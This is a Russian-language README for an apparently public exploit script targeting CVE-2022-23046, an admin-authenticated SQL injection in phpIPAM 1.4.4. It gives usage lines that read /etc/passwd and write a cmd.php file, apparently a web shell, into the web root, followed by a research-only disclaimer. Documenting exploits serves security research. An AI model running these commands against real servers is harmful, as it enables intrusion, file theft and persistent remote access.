
CVE-2022-23046 phpIPAM 1.4.4
phpIPAM v1.4.4 позволяет аутентифицированному пользователю с правами администратора внедрять SQL-выражения в параметр subnet при поиске подсети через app/admin/routing/edit-bgp-mapping-search.php. Данный проект выводит информацию о базе данных и версии хоста. Он также может попытаться читать файлы и записывать на сервер.
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -f /etc/passwd
python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -w /var/www/html/cmd.php
Для вызова справки:
python3 phpipam_1.4.4.py -h
Весь код, предоставленный в этом репозитории, предназначен только для образовательных/исследовательских целей. Любые действия и/или мероприятия, связанные с материалом, содержащимся в этом репозитории, являются исключительно вашей ответственностью. Неправильное использование кода из этого репозитория может привести к возбуждению уголовного дела против соответствующих лиц. Автор не несет ответственности в случае предъявления уголовных обвинений любым лицам, неправильно использующим код из этого репозитория для нарушения закона.